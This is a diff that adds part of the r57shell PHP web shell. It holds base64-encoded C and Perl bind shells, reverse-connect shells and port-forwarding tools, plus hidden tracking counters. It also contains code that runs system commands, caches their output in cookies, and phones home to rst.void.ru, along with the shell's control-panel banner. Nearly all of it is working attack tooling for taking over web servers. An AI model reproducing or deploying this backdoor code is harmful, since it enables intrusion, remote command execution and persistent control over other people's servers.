+    function SearchText($phrase=0,$case=0) {
+    $qq = @explode(' ',$this->text);
+    $delim = '|';
+      if($phrase)
+        foreach($qq as $k=>$v)
+          $qq[$k] = '\b'.$v.'\b';
+      $words = '('.@implode($delim,$qq).')';
+      $pattern = "/".$words."/";
+      if(!$case)
+        $pattern .= 'i';
+      foreach($this->FilesToSearch as $k=>$filename)
+      {
+        $this->FileMatchesCount[$filename] = 0;
+        $FileStrings = @file($filename) or @next;
+        for($a=0;$a<@count($FileStrings);$a++)
+        {
+          $count = 0;
+          $CurString = $FileStrings[$a];
+          $CurString = @Trim($CurString);
+          $CurString = @strip_tags($CurString);
+          $aa = '';
+          if(($count = @preg_match_all($pattern,$CurString,$aa)))
+          {
+            $CurString = @preg_replace($pattern,"<SPAN style='color: #990000;'><b>\\1</b></SPAN>",$CurString);
+            $this->ResultFiles[$filename][$a+1] = $CurString;
+            $this->MatchesCount += $count;
+            $this->FileMatchesCount[$filename] += $count;
+          }
+        }
+      }
+      $this->TimeTotal = @round(getmicrotime() - $this->TimeStart,4);
+    }
+  }
+  function getmicrotime()
+  {
+    list($usec,$sec) = @explode(" ",@microtime());
+    return ((float)$usec + (float)$sec);
+  }
+$port_bind_bd_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8c3lzL3R5cGVzLmg+DQojaW5jbHVkZS
+A8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxlcnJuby5oPg0KaW50IG1haW4oYXJnYyxhcmd2KQ0KaW50I
+GFyZ2M7DQpjaGFyICoqYXJndjsNCnsgIA0KIGludCBzb2NrZmQsIG5ld2ZkOw0KIGNoYXIgYnVmWzMwXTsNCiBzdHJ1Y3Qgc29ja2FkZHJfaW4gcmVt
+b3RlOw0KIGlmKGZvcmsoKSA9PSAwKSB7IA0KIHJlbW90ZS5zaW5fZmFtaWx5ID0gQUZfSU5FVDsNCiByZW1vdGUuc2luX3BvcnQgPSBodG9ucyhhdG9
+pKGFyZ3ZbMV0pKTsNCiByZW1vdGUuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7IA0KIHNvY2tmZCA9IHNvY2tldChBRl9JTkVULF
+NPQ0tfU1RSRUFNLDApOw0KIGlmKCFzb2NrZmQpIHBlcnJvcigic29ja2V0IGVycm9yIik7DQogYmluZChzb2NrZmQsIChzdHJ1Y3Qgc29ja2FkZHIgK
+ikmcmVtb3RlLCAweDEwKTsNCiBsaXN0ZW4oc29ja2ZkLCA1KTsNCiB3aGlsZSgxKQ0KICB7DQogICBuZXdmZD1hY2NlcHQoc29ja2ZkLDAsMCk7DQog
+ICBkdXAyKG5ld2ZkLDApOw0KICAgZHVwMihuZXdmZCwxKTsNCiAgIGR1cDIobmV3ZmQsMik7DQogICB3cml0ZShuZXdmZCwiUGFzc3dvcmQ6IiwxMCk
+7DQogICByZWFkKG5ld2ZkLGJ1ZixzaXplb2YoYnVmKSk7DQogICBpZiAoIWNocGFzcyhhcmd2WzJdLGJ1ZikpDQogICBzeXN0ZW0oImVjaG8gd2VsY2
+9tZSB0byByNTcgc2hlbGwgJiYgL2Jpbi9iYXNoIC1pIik7DQogICBlbHNlDQogICBmcHJpbnRmKHN0ZGVyciwiU29ycnkiKTsNCiAgIGNsb3NlKG5ld
+2ZkKTsNCiAgfQ0KIH0NCn0NCmludCBjaHBhc3MoY2hhciAqYmFzZSwgY2hhciAqZW50ZXJlZCkgew0KaW50IGk7DQpmb3IoaT0wO2k8c3RybGVuKGVu
+dGVyZWQpO2krKykgDQp7DQppZihlbnRlcmVkW2ldID09ICdcbicpDQplbnRlcmVkW2ldID0gJ1wwJzsgDQppZihlbnRlcmVkW2ldID09ICdccicpDQp
+lbnRlcmVkW2ldID0gJ1wwJzsNCn0NCmlmICghc3RyY21wKGJhc2UsZW50ZXJlZCkpDQpyZXR1cm4gMDsNCn0=";
+$port_bind_bd_pl="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vYmFzaCAtaSI7DQppZiAoQEFSR1YgPCAxKSB7IGV4aXQoMSk7IH0NCiRMS
+VNURU5fUE9SVD0kQVJHVlswXTsNCnVzZSBTb2NrZXQ7DQokcHJvdG9jb2w9Z2V0cHJvdG9ieW5hbWUoJ3RjcCcpOw0Kc29ja2V0KFMsJlBGX0lORVQs
+JlNPQ0tfU1RSRUFNLCRwcm90b2NvbCkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVV
+TRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJExJU1RFTl9QT1JULElOQUREUl9BTlkpKSB8fCBkaWUgIkNhbnQgb3BlbiBwb3J0XG4iOw0KbG
+lzdGVuKFMsMykgfHwgZGllICJDYW50IGxpc3RlbiBwb3J0XG4iOw0Kd2hpbGUoMSkNCnsNCmFjY2VwdChDT05OLFMpOw0KaWYoISgkcGlkPWZvcmspK
+Q0Kew0KZGllICJDYW5ub3QgZm9yayIgaWYgKCFkZWZpbmVkICRwaWQpOw0Kb3BlbiBTVERJTiwiPCZDT05OIjsNCm9wZW4gU1RET1VULCI+JkNPTk4i
+Ow0Kb3BlbiBTVERFUlIsIj4mQ09OTiI7DQpleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCmNsb3N
+lIENPTk47DQpleGl0IDA7DQp9DQp9";
+$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj
+aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR
+hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT
+sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI
+kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi
+KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl
+OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
+$back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC
+BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb
+SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd
+KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ
+sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC
+Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D
+QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp
+Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ==";
+$datapipe_c="I2luY2x1ZGUgPHN5cy90eXBlcy5oPg0KI2luY2x1ZGUgPHN5cy9zb2NrZXQuaD4NCiNpbmNsdWRlIDxzeXMvd2FpdC5oPg0KI2luY2
+x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxzdGRpby5oPg0KI2luY2x1ZGUgPHN0ZGxpYi5oPg0KI2luY2x1ZGUgPGVycm5vLmg+DQojaW5jb
+HVkZSA8dW5pc3RkLmg+DQojaW5jbHVkZSA8bmV0ZGIuaD4NCiNpbmNsdWRlIDxsaW51eC90aW1lLmg+DQojaWZkZWYgU1RSRVJST1INCmV4dGVybiBj
+aGFyICpzeXNfZXJybGlzdFtdOw0KZXh0ZXJuIGludCBzeXNfbmVycjsNCmNoYXIgKnVuZGVmID0gIlVuZGVmaW5lZCBlcnJvciI7DQpjaGFyICpzdHJ
+lcnJvcihlcnJvcikgIA0KaW50IGVycm9yOyAgDQp7IA0KaWYgKGVycm9yID4gc3lzX25lcnIpDQpyZXR1cm4gdW5kZWY7DQpyZXR1cm4gc3lzX2Vycm
+xpc3RbZXJyb3JdOw0KfQ0KI2VuZGlmDQoNCm1haW4oYXJnYywgYXJndikgIA0KICBpbnQgYXJnYzsgIA0KICBjaGFyICoqYXJndjsgIA0KeyANCiAga
+W50IGxzb2NrLCBjc29jaywgb3NvY2s7DQogIEZJTEUgKmNmaWxlOw0KICBjaGFyIGJ1Zls0MDk2XTsNCiAgc3RydWN0IHNvY2thZGRyX2luIGxhZGRy
+LCBjYWRkciwgb2FkZHI7DQogIGludCBjYWRkcmxlbiA9IHNpemVvZihjYWRkcik7DQogIGZkX3NldCBmZHNyLCBmZHNlOw0KICBzdHJ1Y3QgaG9zdGV
+udCAqaDsNCiAgc3RydWN0IHNlcnZlbnQgKnM7DQogIGludCBuYnl0Ow0KICB1bnNpZ25lZCBsb25nIGE7DQogIHVuc2lnbmVkIHNob3J0IG9wb3J0Ow
+0KDQogIGlmIChhcmdjICE9IDQpIHsNCiAgICBmcHJpbnRmKHN0ZGVyciwiVXNhZ2U6ICVzIGxvY2FscG9ydCByZW1vdGVwb3J0IHJlbW90ZWhvc3Rcb
+iIsYXJndlswXSk7DQogICAgcmV0dXJuIDMwOw0KICB9DQogIGEgPSBpbmV0X2FkZHIoYXJndlszXSk7DQogIGlmICghKGggPSBnZXRob3N0YnluYW1l
+KGFyZ3ZbM10pKSAmJg0KICAgICAgIShoID0gZ2V0aG9zdGJ5YWRkcigmYSwgNCwgQUZfSU5FVCkpKSB7DQogICAgcGVycm9yKGFyZ3ZbM10pOw0KICA
+gIHJldHVybiAyNTsNCiAgfQ0KICBvcG9ydCA9IGF0b2woYXJndlsyXSk7DQogIGxhZGRyLnNpbl9wb3J0ID0gaHRvbnMoKHVuc2lnbmVkIHNob3J0KS
+hhdG9sKGFyZ3ZbMV0pKSk7DQogIGlmICgobHNvY2sgPSBzb2NrZXQoUEZfSU5FVCwgU09DS19TVFJFQU0sIElQUFJPVE9fVENQKSkgPT0gLTEpIHsNC
+iAgICBwZXJyb3IoInNvY2tldCIpOw0KICAgIHJldHVybiAyMDsNCiAgfQ0KICBsYWRkci5zaW5fZmFtaWx5ID0gaHRvbnMoQUZfSU5FVCk7DQogIGxh
+ZGRyLnNpbl9hZGRyLnNfYWRkciA9IGh0b25sKDApOw0KICBpZiAoYmluZChsc29jaywgJmxhZGRyLCBzaXplb2YobGFkZHIpKSkgew0KICAgIHBlcnJ
+vcigiYmluZCIpOw0KICAgIHJldHVybiAyMDsNCiAgfQ0KICBpZiAobGlzdGVuKGxzb2NrLCAxKSkgew0KICAgIHBlcnJvcigibGlzdGVuIik7DQogIC
+AgcmV0dXJuIDIwOw0KICB9DQogIGlmICgobmJ5dCA9IGZvcmsoKSkgPT0gLTEpIHsNCiAgICBwZXJyb3IoImZvcmsiKTsNCiAgICByZXR1cm4gMjA7D
+QogIH0NCiAgaWYgKG5ieXQgPiAwKQ0KICAgIHJldHVybiAwOw0KICBzZXRzaWQoKTsNCiAgd2hpbGUgKChjc29jayA9IGFjY2VwdChsc29jaywgJmNh
+ZGRyLCAmY2FkZHJsZW4pKSAhPSAtMSkgew0KICAgIGNmaWxlID0gZmRvcGVuKGNzb2NrLCJyKyIpOw0KICAgIGlmICgobmJ5dCA9IGZvcmsoKSkgPT0
+gLTEpIHsNCiAgICAgIGZwcmludGYoY2ZpbGUsICI1MDAgZm9yazogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgICBzaHV0ZG93bihjc29jay
+wyKTsNCiAgICAgIGZjbG9zZShjZmlsZSk7DQogICAgICBjb250aW51ZTsNCiAgICB9DQogICAgaWYgKG5ieXQgPT0gMCkNCiAgICAgIGdvdG8gZ290c
+29jazsNCiAgICBmY2xvc2UoY2ZpbGUpOw0KICAgIHdoaWxlICh3YWl0cGlkKC0xLCBOVUxMLCBXTk9IQU5HKSA+IDApOw0KICB9DQogIHJldHVybiAy
+MDsNCg0KIGdvdHNvY2s6DQogIGlmICgob3NvY2sgPSBzb2NrZXQoUEZfSU5FVCwgU09DS19TVFJFQU0sIElQUFJPVE9fVENQKSkgPT0gLTEpIHsNCiA
+gICBmcHJpbnRmKGNmaWxlLCAiNTAwIHNvY2tldDogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgZ290byBxdWl0MTsNCiAgfQ0KICBvYWRkci
+5zaW5fZmFtaWx5ID0gaC0+aF9hZGRydHlwZTsNCiAgb2FkZHIuc2luX3BvcnQgPSBodG9ucyhvcG9ydCk7DQogIG1lbWNweSgmb2FkZHIuc2luX2FkZ
+HIsIGgtPmhfYWRkciwgaC0+aF9sZW5ndGgpOw0KICBpZiAoY29ubmVjdChvc29jaywgJm9hZGRyLCBzaXplb2Yob2FkZHIpKSkgew0KICAgIGZwcmlu
+dGYoY2ZpbGUsICI1MDAgY29ubmVjdDogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgZ290byBxdWl0MTsNCiAgfQ0KICB3aGlsZSAoMSkgew0
+KICAgIEZEX1pFUk8oJmZkc3IpOw0KICAgIEZEX1pFUk8oJmZkc2UpOw0KICAgIEZEX1NFVChjc29jaywmZmRzcik7DQogICAgRkRfU0VUKGNzb2NrLC
+ZmZHNlKTsNCiAgICBGRF9TRVQob3NvY2ssJmZkc3IpOw0KICAgIEZEX1NFVChvc29jaywmZmRzZSk7DQogICAgaWYgKHNlbGVjdCgyMCwgJmZkc3IsI
+E5VTEwsICZmZHNlLCBOVUxMKSA9PSAtMSkgew0KICAgICAgZnByaW50ZihjZmlsZSwgIjUwMCBzZWxlY3Q6ICVzXG4iLCBzdHJlcnJvcihlcnJubykp
+Ow0KICAgICAgZ290byBxdWl0MjsNCiAgICB9DQogICAgaWYgKEZEX0lTU0VUKGNzb2NrLCZmZHNyKSB8fCBGRF9JU1NFVChjc29jaywmZmRzZSkpIHs
+NCiAgICAgIGlmICgobmJ5dCA9IHJlYWQoY3NvY2ssYnVmLDQwOTYpKSA8PSAwKQ0KCWdvdG8gcXVpdDI7DQogICAgICBpZiAoKHdyaXRlKG9zb2NrLG
+J1ZixuYnl0KSkgPD0gMCkNCglnb3RvIHF1aXQyOw0KICAgIH0gZWxzZSBpZiAoRkRfSVNTRVQob3NvY2ssJmZkc3IpIHx8IEZEX0lTU0VUKG9zb2NrL
+CZmZHNlKSkgew0KICAgICAgaWYgKChuYnl0ID0gcmVhZChvc29jayxidWYsNDA5NikpIDw9IDApDQoJZ290byBxdWl0MjsNCiAgICAgIGlmICgod3Jp
+dGUoY3NvY2ssYnVmLG5ieXQpKSA8PSAwKQ0KCWdvdG8gcXVpdDI7DQogICAgfQ0KICB9DQoNCiBxdWl0MjoNCiAgc2h1dGRvd24ob3NvY2ssMik7DQo
+gIGNsb3NlKG9zb2NrKTsNCiBxdWl0MToNCiAgZmZsdXNoKGNmaWxlKTsNCiAgc2h1dGRvd24oY3NvY2ssMik7DQogcXVpdDA6DQogIGZjbG9zZShjZm
+lsZSk7DQogIHJldHVybiAwOw0KfQ==";
+$datapipe_pl="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgSU86OlNvY2tldDsNCnVzZSBQT1NJWDsNCiRsb2NhbHBvcnQgPSAkQVJHVlswXTsNCiRob3N0I
+CAgICAgPSAkQVJHVlsxXTsNCiRwb3J0ICAgICAgPSAkQVJHVlsyXTsNCiRkYWVtb249MTsNCiRESVIgPSB1bmRlZjsNCiR8ID0gMTsNCmlmICgkZGFl
+bW9uKXsgJHBpZCA9IGZvcms7IGV4aXQgaWYgJHBpZDsgZGllICIkISIgdW5sZXNzIGRlZmluZWQoJHBpZCk7IFBPU0lYOjpzZXRzaWQoKSBvciBkaWU
+gIiQhIjsgfQ0KJW8gPSAoJ3BvcnQnID0+ICRsb2NhbHBvcnQsJ3RvcG9ydCcgPT4gJHBvcnQsJ3RvaG9zdCcgPT4gJGhvc3QpOw0KJGFoID0gSU86Ol
+NvY2tldDo6SU5FVC0+bmV3KCdMb2NhbFBvcnQnID0+ICRsb2NhbHBvcnQsJ1JldXNlJyA9PiAxLCdMaXN0ZW4nID0+IDEwKSB8fCBkaWUgIiQhIjsNC
+iRTSUd7J0NITEQnfSA9ICdJR05PUkUnOw0KJG51bSA9IDA7DQp3aGlsZSAoMSkgeyANCiRjaCA9ICRhaC0+YWNjZXB0KCk7IGlmICghJGNoKSB7IHBy
+aW50IFNUREVSUiAiJCFcbiI7IG5leHQ7IH0NCisrJG51bTsNCiRwaWQgPSBmb3JrKCk7DQppZiAoIWRlZmluZWQoJHBpZCkpIHsgcHJpbnQgU1RERVJ
+SICIkIVxuIjsgfSANCmVsc2lmICgkcGlkID09IDApIHsgJGFoLT5jbG9zZSgpOyBSdW4oXCVvLCAkY2gsICRudW0pOyB9IA0KZWxzZSB7ICRjaC0+Y2
+xvc2UoKTsgfQ0KfQ0Kc3ViIFJ1biB7DQpteSgkbywgJGNoLCAkbnVtKSA9IEBfOw0KbXkgJHRoID0gSU86OlNvY2tldDo6SU5FVC0+bmV3KCdQZWVyQ
+WRkcicgPT4gJG8tPnsndG9ob3N0J30sJ1BlZXJQb3J0JyA9PiAkby0+eyd0b3BvcnQnfSk7DQppZiAoISR0aCkgeyBleGl0IDA7IH0NCm15ICRmaDsN
+CmlmICgkby0+eydkaXInfSkgeyAkZmggPSBTeW1ib2w6OmdlbnN5bSgpOyBvcGVuKCRmaCwgIj4kby0+eydkaXInfS90dW5uZWwkbnVtLmxvZyIpIG9
+yIGRpZSAiJCEiOyB9DQokY2gtPmF1dG9mbHVzaCgpOw0KJHRoLT5hdXRvZmx1c2goKTsNCndoaWxlICgkY2ggfHwgJHRoKSB7DQpteSAkcmluID0gIi
+I7DQp2ZWMoJHJpbiwgZmlsZW5vKCRjaCksIDEpID0gMSBpZiAkY2g7DQp2ZWMoJHJpbiwgZmlsZW5vKCR0aCksIDEpID0gMSBpZiAkdGg7DQpteSgkc
+m91dCwgJGVvdXQpOw0Kc2VsZWN0KCRyb3V0ID0gJHJpbiwgdW5kZWYsICRlb3V0ID0gJHJpbiwgMTIwKTsNCmlmICghJHJvdXQgICYmICAhJGVvdXQp
+IHt9DQpteSAkY2J1ZmZlciA9ICIiOw0KbXkgJHRidWZmZXIgPSAiIjsNCmlmICgkY2ggJiYgKHZlYygkZW91dCwgZmlsZW5vKCRjaCksIDEpIHx8IHZ
+lYygkcm91dCwgZmlsZW5vKCRjaCksIDEpKSkgew0KbXkgJHJlc3VsdCA9IHN5c3JlYWQoJGNoLCAkdGJ1ZmZlciwgMTAyNCk7DQppZiAoIWRlZmluZW
+QoJHJlc3VsdCkpIHsNCnByaW50IFNUREVSUiAiJCFcbiI7DQpleGl0IDA7DQp9DQppZiAoJHJlc3VsdCA9PSAwKSB7IGV4aXQgMDsgfQ0KfQ0KaWYgK
+CR0aCAgJiYgICh2ZWMoJGVvdXQsIGZpbGVubygkdGgpLCAxKSAgfHwgdmVjKCRyb3V0LCBmaWxlbm8oJHRoKSwgMSkpKSB7DQpteSAkcmVzdWx0ID0g
+c3lzcmVhZCgkdGgsICRjYnVmZmVyLCAxMDI0KTsNCmlmICghZGVmaW5lZCgkcmVzdWx0KSkgeyBwcmludCBTVERFUlIgIiQhXG4iOyBleGl0IDA7IH0
+NCmlmICgkcmVzdWx0ID09IDApIHtleGl0IDA7fQ0KfQ0KaWYgKCRmaCAgJiYgICR0YnVmZmVyKSB7KHByaW50ICRmaCAkdGJ1ZmZlcik7fQ0Kd2hpbG
+UgKG15ICRsZW4gPSBsZW5ndGgoJHRidWZmZXIpKSB7DQpteSAkcmVzID0gc3lzd3JpdGUoJHRoLCAkdGJ1ZmZlciwgJGxlbik7DQppZiAoJHJlcyA+I
+DApIHskdGJ1ZmZlciA9IHN1YnN0cigkdGJ1ZmZlciwgJHJlcyk7fSANCmVsc2Uge3ByaW50IFNUREVSUiAiJCFcbiI7fQ0KfQ0Kd2hpbGUgKG15ICRs
+ZW4gPSBsZW5ndGgoJGNidWZmZXIpKSB7DQpteSAkcmVzID0gc3lzd3JpdGUoJGNoLCAkY2J1ZmZlciwgJGxlbik7DQppZiAoJHJlcyA+IDApIHskY2J
+1ZmZlciA9IHN1YnN0cigkY2J1ZmZlciwgJHJlcyk7fSANCmVsc2Uge3ByaW50IFNUREVSUiAiJCFcbiI7fQ0KfX19DQo=";
+$c1 = "PHNjcmlwdCBsYW5ndWFnZT0iamF2YXNjcmlwdCI+aG90bG9nX2pzPSIxLjAiO2hvdGxvZ19yPSIiK01hdGgucmFuZG9tKCkrIiZzPTgxNjA2
+JmltPTEmcj0iK2VzY2FwZShkb2N1bWVudC5yZWZlcnJlcikrIiZwZz0iK2VzY2FwZSh3aW5kb3cubG9jYXRpb24uaHJlZik7ZG9jdW1lbnQuY29va2l
+lPSJob3Rsb2c9MTsgcGF0aD0vIjsgaG90bG9nX3IrPSImYz0iKyhkb2N1bWVudC5jb29raWU/IlkiOiJOIik7PC9zY3JpcHQ+PHNjcmlwdCBsYW5ndW
+FnZT0iamF2YXNjcmlwdDEuMSI+aG90bG9nX2pzPSIxLjEiO2hvdGxvZ19yKz0iJmo9IisobmF2aWdhdG9yLmphdmFFbmFibGVkKCk/IlkiOiJOIik8L
+3NjcmlwdD48c2NyaXB0IGxhbmd1YWdlPSJqYXZhc2NyaXB0MS4yIj5ob3Rsb2dfanM9IjEuMiI7aG90bG9nX3IrPSImd2g9IitzY3JlZW4ud2lkdGgr
+J3gnK3NjcmVlbi5oZWlnaHQrIiZweD0iKygoKG5hdmlnYXRvci5hcHBOYW1lLnN1YnN0cmluZygwLDMpPT0iTWljIikpP3NjcmVlbi5jb2xvckRlcHR
+oOnNjcmVlbi5waXhlbERlcHRoKTwvc2NyaXB0PjxzY3JpcHQgbGFuZ3VhZ2U9ImphdmFzY3JpcHQxLjMiPmhvdGxvZ19qcz0iMS4zIjwvc2NyaXB0Pj
+xzY3JpcHQgbGFuZ3VhZ2U9ImphdmFzY3JpcHQiPmhvdGxvZ19yKz0iJmpzPSIraG90bG9nX2pzO2RvY3VtZW50LndyaXRlKCI8YSBocmVmPSdodHRwO
+i8vY2xpY2suaG90bG9nLnJ1Lz84MTYwNicgdGFyZ2V0PSdfdG9wJz48aW1nICIrIiBzcmM9J2h0dHA6Ly9oaXQ0LmhvdGxvZy5ydS9jZ2ktYmluL2hv
+dGxvZy9jb3VudD8iK2hvdGxvZ19yKyImJyBib3JkZXI9MCB3aWR0aD0xIGhlaWdodD0xIGFsdD0xPjwvYT4iKTwvc2NyaXB0Pjxub3NjcmlwdD48YSB
+ocmVmPWh0dHA6Ly9jbGljay5ob3Rsb2cucnUvPzgxNjA2IHRhcmdldD1fdG9wPjxpbWdzcmM9Imh0dHA6Ly9oaXQ0LmhvdGxvZy5ydS9jZ2ktYmluL2
+hvdGxvZy9jb3VudD9zPTgxNjA2JmltPTEiIGJvcmRlcj0wd2lkdGg9IjEiIGhlaWdodD0iMSIgYWx0PSJIb3RMb2ciPjwvYT48L25vc2NyaXB0Pg==";
+$c2 = "PCEtLUxpdmVJbnRlcm5ldCBjb3VudGVyLS0+PHNjcmlwdCBsYW5ndWFnZT0iSmF2YVNjcmlwdCI+PCEtLQ0KZG9jdW1lbnQud3JpdGUoJzxh
+IGhyZWY9Imh0dHA6Ly93d3cubGl2ZWludGVybmV0LnJ1L2NsaWNrIiAnKw0KJ3RhcmdldD1fYmxhbms+PGltZyBzcmM9Imh0dHA6Ly9jb3VudGVyLnl
+hZHJvLnJ1L2hpdD90NTIuNjtyJysNCmVzY2FwZShkb2N1bWVudC5yZWZlcnJlcikrKCh0eXBlb2Yoc2NyZWVuKT09J3VuZGVmaW5lZCcpPycnOg0KJz
+tzJytzY3JlZW4ud2lkdGgrJyonK3NjcmVlbi5oZWlnaHQrJyonKyhzY3JlZW4uY29sb3JEZXB0aD8NCnNjcmVlbi5jb2xvckRlcHRoOnNjcmVlbi5wa
+XhlbERlcHRoKSkrJzsnK01hdGgucmFuZG9tKCkrDQonIiBhbHQ9ImxpdmVpbnRlcm5ldC5ydTog7+7q4Ofg7e4g9+jx6+4g7/Du8ezu8vDu4iDoIO/u
+8eXy6PLl6+XpIOfgIDI0IPfg8eAiICcrDQonYm9yZGVyPTAgd2lkdGg9MCBoZWlnaHQ9MD48L2E+JykvLy0tPjwvc2NyaXB0PjwhLS0vTGl2ZUludGV
+ybmV0LS0+";
+if($unix)
+ {
+ if(!isset($_COOKIE['uname'])) { $uname = ex('uname -a'); setcookie('uname',$uname); } else { $uname = $_COOKIE['uname']; }
+ if(!isset($_COOKIE['id'])) { $id = ex('id'); setcookie('id',$id); } else { $id = $_COOKIE['id']; }
+ if($safe_mode) { $sysctl = '-'; }
+ else if(isset($_COOKIE['sysctl'])) { $sysctl = $_COOKIE['sysctl']; }
+ else  
+  {	
+   $sysctl = ex('sysctl -n kern.ostype && sysctl -n kern.osrelease');
+   if(empty($sysctl)) { $sysctl = ex('sysctl -n kernel.ostype && sysctl -n kernel.osrelease'); }
+   if(empty($sysctl)) { $sysctl = '-'; }
+   setcookie('sysctl',$sysctl);
+  }  
+ }
+echo $head;
+echo '</head>';
+if(empty($_POST['cmd'])) {
+$serv = array(127,192,172,10);
+$addr=@explode('.', $_SERVER['SERVER_ADDR']);
+$current_version = str_replace('.','',$version);
+if (!in_array($addr[0], $serv)) {
+@print "<img src=\"http://rst.void.ru/r57shell_version/version.php?img=1&version=".$current_version."\" border=0 height=0 width=0>";
+@readfile ("http://rst.void.ru/r57shell_version/version.php?version=".$current_version."");}}  
+echo '<body><table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc width=160><font face=Verdana size=2>'.ws(2).'<font face=Webdings size=6><b>!</b></font><b>'.ws(2).'r57shell '.$version.'</b></font></td><td bgcolor=#cccccc><font face=Verdana size=-2>';
+echo ws(2)."<b>".date ("d-m-Y H:i:s")."</b>";
+echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?phpinfo title=\"".$lang[$language.'_text46']."\"><b>phpinfo</b></a> ".$rb;
+echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?phpini title=\"".$lang[$language.'_text47']."\"><b>php.ini</b></a> ".$rb;
+if($unix) 
+ { 
+ echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?cpu title=\"".$lang[$language.'_text50']."\"><b>cpu</b></a> ".$rb;
+ echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?mem title=\"".$lang[$language.'_text51']."\"><b>mem</b></a> ".$rb;
+ echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?users title=\"".$lang[$language.'_text95']."\"><b>users</b></a> ".$rb; 
+ }
+echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?tmp title=\"".$lang[$language.'_text48']."\"><b>tmp</b></a> ".$rb;
+echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?delete title=\"".$lang[$language.'_text49']."\"><b>delete</b></a> ".$rb."<br>";
+echo ws(2)."safe_mode: <b>";
+echo (($safe_mode)?("<font color=green>ON</font>"):("<font color=red>OFF</font>"));
+echo "</b>".ws(2);
+echo "PHP version: <b>".@phpversion()."</b>";
+$curl_on = @function_exists('curl_version');
+echo ws(2);
+echo "cURL: <b>".(($curl_on)?("<font color=green>ON</font>"):("<font color=red>OFF</font>"));
+echo "</b>".ws(2);
+echo "MySQL: <b>";
+$mysql_on = @function_exists('mysql_connect');
+if($mysql_on){
+echo "<font color=green>ON</font>"; } else { echo "<font color=red>OFF</font>"; }
+echo "</b>".ws(2);
+echo "MSSQL: <b>";
+$mssql_on = @function_exists('mssql_connect');
+if($mssql_on){echo "<font color=green>ON</font>";}else{echo "<font color=red>OFF</font>";}
+echo "</b>".ws(2);
+echo "PostgreSQL: <b>";
+$pg_on = @function_exists('pg_connect');
+if($pg_on){echo "<font color=green>ON</font>";}else{echo "<font color=red>OFF</font>";}
+echo "</b>".ws(2);
